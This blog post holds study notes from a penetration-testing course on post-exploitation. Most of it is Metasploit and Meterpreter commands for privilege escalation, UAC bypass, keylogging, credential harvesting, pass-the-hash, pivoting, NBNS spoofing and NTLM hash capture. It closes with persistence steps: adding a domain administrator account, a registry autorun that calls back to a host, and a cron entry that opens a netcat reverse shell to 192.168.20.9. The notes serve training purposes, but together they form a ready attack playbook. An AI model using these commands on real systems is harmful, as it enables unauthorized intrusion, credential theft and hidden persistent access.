Advanced Penetration Testing: Post-Exploitation

Course:  Georgia Weidman on “Advanced Penetration Testing” at Cybrary


(1) Metasploit Scripts:

msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf >use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

(7) Local Information Gathering: Searching for Files
meterpreter > search -f *password*

(8) Local Information Gathering: Gathering Passwords
usr/share/metasploit-framework/modules/post/ windows/gather/credentials

(9) Local Information Gathering: Keylogging
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

(10) Lateral Movement: PSExec
msf > use exploit/windows/smb/psexec

(11) Lateral Movement: Pass the Hash
Replace password with the LM:NTLM hash from hashdump
We are still able to authenticate using Psexec

(12) Lateral Movement:Token Impersonation
load incognito
list tokens –u

(13) Lateral Movement: SMB Capture
Set up SMB capture server in Metasploit
Drop into a shell in a session with an impersonated token

(14) Pivoting through Metasploit
route add 172.16.85.0 255.255.255.0 2
Routes traffic to 172.16.85.0/24 network through session 2

(15) Pivoting with socks4a and proxychains
use auxiliary/server/socks4a
Edit /etc/proxychains.conf change port to 1080
proxychains nmap -Pn -sT -sV -p 445,446 172.16.85.190

(16) NBNS Spoofing
Listen for NBNS requests and respond accordingly, can get machines to send hashes or possibly even plaintext
​msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.20.9
msf auxiliary(nbns_response) > exploit
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /root/johnsmb
msf auxiliary(http_ntlm) > exploit
msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set LOGFILE /root/httplog
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > exploit

(17) Responder
Automates NBNS spoofing attacks
cd Responder
python Responder.py –i 192.168.20.9

(A) Persistence: Adding a User
net user john johnspassword /add /domain
net localgroup administrators john /add /domain
Add /domain at the end to add the user to a domain as well

(B) Persistence: With Metasploit Script​
Metasploit persistence script creates an autorun entry in the registry. Not stealthy (writes to a disk)
run persistence -r 192.168.20.9 -p 2345 -U

(C) Persistence: Crontabs
Add to /etc/crontab file
*/10 * * * * root nc 192.168.20.9 12345 -e /bin/bash

service cron restart

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s